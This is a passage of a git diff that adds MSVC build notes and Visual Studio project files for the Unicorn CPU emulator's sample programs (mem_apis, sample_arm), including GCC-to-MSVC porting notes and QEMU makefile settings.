Character Set +Runtime Library Debug: Multi-threaded Debug (/MTd) +Runtime Library Release: Multi-threaded (/MT) +Precompiled Header: Not Using Precompiled Headers +Additional Options: /wd4018 /wd4244 /wd4267 + + +:: Build advice + +- If you see warnings about spectre-mitigated libraries and then some strange + errors, the errors may be related to the spectre libraries. Install them. + (via the visual studio installation manager) +- The "platform default" target SDK may not actually be installed for you. Try + installing the Windows 8.1 SDK via the visual studio installation manager. + + +:: Changes porting unicorn from GNU/GCC to MSVC. + +There were many many many changes to make this also build in MSVC +while still retaining the ability to build in GNU/GCC. +Most were due to either GCC specific things or MSVC lack of decent +standard C support especially in VS2012. Also some were for +posix/platform specific stuff that is not present in windows. + +Some of the more common changes were: + +* Compatibility for GCC style __attribute__'s. + +* Change GCC switch case ranges to specify every case individually, ie: + "case 1 ... 3:" changes to "case 1: case 2: case 3:" + +* Change GCC struct member initialisation to the more generic + initialisation of all members in order, ie: + { .value = 1, .stuff = 2 } to { 1, 2 } + +* Remove GCC style macro return values which MSVC does not support, ie: + #define RETURN_ONE(x) ({ some stuff; (void)1; }) + +* Compatibility for posix headers that are missing in windows, ie: + stdbool.h, stdint.h, sys/time.h, unistd.h + + +:: CPU specific libraries + +The gnu/gcc way of building the qemu portion of unicorn-engine involves makefile magic +that builds the same set of sourcecode files multiple times. They are built once for each +supported CPU type and force "#include" a CPU specific header file to re-"#define" +function and variable names that would otherwise be the same for each build. +These multiple builds of the same files are then all linked together to form +the unicorn library. + +As an example when building for "x86_64" cpu type the generated header file "x86_64.h" +is force included and it contains a bunch of defines such as: + #define phys_mem_clean phys_mem_clean_x86_64 +So you can see that it adds the cpu type on to the end of each name in order +to keep the names unique over the multiple builds. + +The way I handle this in MSVC is to build a seperate cpu specific library, containing +this set of repeatedly used sourcecode files, for each supported cpu type. +These cpu specific libraries are then linked together to build the unicorn library. + +For each supported CPU type + +* Each CPU specific lib has a "forced include" file specified at: + Configuration Properties -> C/C++ -> Advanced -> Forced Include File + so for x86-64 this is "the file "x86_64.h" which is a generated file. + + +:: Other things + +* The Qemu code for GNU/GCC seems to rely on __i386__ or __x86_64__ defined if + the host is 32bit or 64bit respectively. + So when building 32bit libs in msvc we define __i386__. + And when building 64bit libs in msvc we define __x86_64__. + +* There is a tcg-target.c for each target that is included into tcg.c. + This is done using "#include tcg-target.c" + It is NOT built separately as part of the *.c files for the project. + + +:: Info from makefiles + +This info is compiled here together to help with deciding on the build settings to use. +It may or may not be of use to anyone in the future once this all builds ok :) + +QEMU_INCLUDES=-I$(SRC_PATH)/tcg -I$(SRC_PATH)/tcg/$(ARCH) -I. -I$(SRC_PATH) -I$(SRC_PATH)/include +QEMU_CFLAGS=-m32 -D__USE_MINGW_ANSI_STDIO=1 -DWIN32_LEAN_AND_MEAN -DWINVER=0x501 -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wstrict-prototypes -Wredundant-decls -Wall -Wundef -Wwrite-strings -Wmissing-prototypes -fno-strict-aliasing -fno-common -DUNICORN_HAS_X86 -DUNICORN_HAS_ARM -DUNICORN_HAS_M68K -DUNICORN_HAS_ARM64 -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL -DUNICORN_HAS_SPARC -fPIC +QEMU_CFLAGS += -I.. -I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) -DNEED_CPU_H +QEMU_CFLAGS+=-I$(SRC_PATH)/include +QEMU_CFLAGS+=-include x86_64.h + + includes +-I$(SRC_PATH)/tcg +-I$(SRC_PATH)/tcg/$(ARCH) +-I. +-I$(SRC_PATH) +-I$(SRC_PATH)/include +-I.. +-I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) +-I$(SRC_PATH)/include +-include x86_64.h + + defines +-D__USE_MINGW_ANSI_STDIO=1 +-DWIN32_LEAN_AND_MEAN +-DWINVER=0x501 +-D_GNU_SOURCE +-D_FILE_OFFSET_BITS=64 +-D_LARGEFILE_SOURCE +-DNEED_CPU_H +-DUNICORN_HAS_X86 +-DUNICORN_HAS_ARM +-DUNICORN_HAS_M68K +-DUNICORN_HAS_ARM64 +-DUNICORN_HAS_MIPS +-DUNICORN_HAS_MIPSEL +-DUNICORN_HAS_MIPS64 +-DUNICORN_HAS_MIPS64EL +-DUNICORN_HAS_SPARC + + + qemu/config-host.mak + extra_cflags=-m32 -DUNICORN_HAS_X86 -DUNICORN_HAS_ARM -DUNICORN_HAS_M68K -DUNICORN_HAS_ARM64 -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL -DUNICORN_HAS_SPARC -fPIC + extra_ldflags= + libs_softmmu= + ARCH=i386 + CONFIG_WIN32=y + CONFIG_FILEVERSION=2,2,1,0 + CONFIG_PRODUCTVERSION=2,2,1,0 + VERSION=2.2.1 + PKGVERSION= + SRC_PATH=/f/GitHub/unicorn/qemu + TARGET_DIRS=x86_64-softmmu arm-softmmu m68k-softmmu aarch64-softmmu mips-softmmu mipsel-softmmu mips64-softmmu mips64el-softmmu sparc-softmmu sparc64-softmmu + GLIB_CFLAGS=-pthread -mms-bitfields -IC:/msys64/mingw32/include/glib-2.0 -IC:/msys64/mingw32/lib/glib-2.0/include + CONFIG_ZERO_MALLOC=y + CONFIG_CPUID_H=y + CONFIG_THREAD_SETNAME_BYTHREAD=y + CONFIG_PTHREAD_SETNAME_NP=y + CFLAGS=-pthread -mms-bitfields -IC:/msys64/mingw32/include/glib-2.0 -IC:/msys64/mingw32/lib/glib-2.0/include -g + + QEMU_CFLAGS=-m32 -D__USE_MINGW_ANSI_STDIO=1 -DWIN32_LEAN_AND_MEAN -DWINVER=0x501 -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wstrict-prototypes -Wredundant-decls -Wall -Wundef -Wwrite-strings -Wmissing-prototypes -fno-strict-aliasing -fno-common -DUNICORN_HAS_X86 -DUNICORN_HAS_ARM -DUNICORN_HAS_M68K -DUNICORN_HAS_ARM64 -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL -DUNICORN_HAS_SPARC -fPIC + QEMU_INCLUDES=-I$(SRC_PATH)/tcg -I$(SRC_PATH)/tcg/$(ARCH) -I. -I$(SRC_PATH) -I$(SRC_PATH)/include + LDFLAGS=-Wl,--nxcompat -Wl,--no-seh -Wl,--dynamicbase -Wl,--warn-common -m32 -g + LIBS+=-LC:/msys64/mingw32/lib -lgthread-2.0 -pthread -lglib-2.0 -lintl -lwinmm -lws2_32 -liphlpapi -lz + + + qemu/x86_64-softmmu/Makefile + QEMU_CFLAGS += -I.. -I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) -DNEED_CPU_H + QEMU_CFLAGS+=-I$(SRC_PATH)/include + + + qemu/x86_64-softmmu/config-target.mak + TARGET_X86_64=y + TARGET_NAME=x86_64 + TARGET_BASE_ARCH=i386 + TARGET_ABI_DIR=x86_64 + CONFIG_SOFTMMU=y + LDFLAGS+= + QEMU_CFLAGS+= + QEMU_CFLAGS+=-include x86_64.h + + + qemu/x86_64-softmmu/config-devices.mak + CONFIG_VGA=y + CONFIG_QXL=$(CONFIG_SPICE) + CONFIG_VGA_PCI=y + CONFIG_VGA_ISA=y + CONFIG_VGA_CIRRUS=y + CONFIG_VMWARE_VGA=y + CONFIG_VMMOUSE=y + CONFIG_SERIAL=y + CONFIG_PARALLEL=y + CONFIG_I8254=y + CONFIG_PCSPK=y + CONFIG_PCKBD=y + CONFIG_FDC=y + CONFIG_ACPI=y + CONFIG_APM=y + CONFIG_I8257=y + CONFIG_IDE_ISA=y + CONFIG_IDE_PIIX=y + CONFIG_NE2000_ISA=y + CONFIG_PIIX_PCI=y + CONFIG_HPET=y + CONFIG_APPLESMC=y + CONFIG_I8259=y + CONFIG_PFLASH_CFI01=y + CONFIG_TPM_TIS=$(CONFIG_TPM) + CONFIG_PCI_HOTPLUG_OLD=y + CONFIG_MC146818RTC=y + CONFIG_PAM=y + CONFIG_PCI_PIIX=y + CONFIG_WDT_IB700=y + CONFIG_XEN_I386=$(CONFIG_XEN) + CONFIG_ISA_DEBUG=y + CONFIG_ISA_TESTDEV=y + CONFIG_VMPORT=y + CONFIG_SGA=y + CONFIG_LPC_ICH9=y + CONFIG_PCI_Q35=y + CONFIG_APIC=y + CONFIG_IOAPIC=y + CONFIG_ICC_BUS=y + CONFIG_PVPANIC=y + CONFIG_MEM_HOTPLUG=y + CONFIG_PCI=y + CONFIG_VIRTIO_PCI=y + CONFIG_VIRTIO=y + CONFIG_USB_UHCI=y + CONFIG_USB_OHCI=y + CONFIG_USB_EHCI=y + CONFIG_USB_XHCI=y + CONFIG_NE2000_PCI=y + CONFIG_EEPRO100_PCI=y + CONFIG_PCNET_PCI=y + CONFIG_PCNET_COMMON=y + CONFIG_AC97=y + CONFIG_HDA=y + CONFIG_ES1370=y + CONFIG_LSI_SCSI_PCI=y + CONFIG_VMW_PVSCSI_SCSI_PCI=y + CONFIG_MEGASAS_SCSI_PCI=y + CONFIG_RTL8139_PCI=y + CONFIG_E1000_PCI=y + CONFIG_VMXNET3_PCI=y + CONFIG_IDE_CORE=y + CONFIG_IDE_QDEV=y + CONFIG_IDE_PCI=y + CONFIG_AHCI=y + CONFIG_ESP=y + CONFIG_ESP_PCI=y + CONFIG_SERIAL=y + CONFIG_SERIAL_PCI=y + CONFIG_IPACK=y + CONFIG_WDT_IB6300ESB=y + CONFIG_PCI_TESTDEV=y + CONFIG_NVME_PCI=y + CONFIG_SB16=y + CONFIG_ADLIB=y + CONFIG_GUS=y + CONFIG_CS4231A=y + CONFIG_USB_TABLET_WACOM=y + CONFIG_USB_STORAGE_BOT=y + CONFIG_USB_STORAGE_UAS=y + CONFIG_USB_STORAGE_MTP=y + CONFIG_USB_SMARTCARD=y + CONFIG_USB_AUDIO=y + CONFIG_USB_SERIAL=y + CONFIG_USB_NETWORK=y + CONFIG_USB_BLUETOOTH=y + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj new file mode 100644 index 0000000..5d1064b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{9D588288-5A28-4AB3-96EA-442CAA508F8E}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mem_apis</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\mem_apis.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj.filters new file mode 100644 index 0000000..570aef1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/mem_apis/mem_apis.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\mem_apis.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj new file mode 100644 index 0000000..b1a88f4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{9F32C692-9106-43AF-A291-779A2D8BE096}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_arm</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 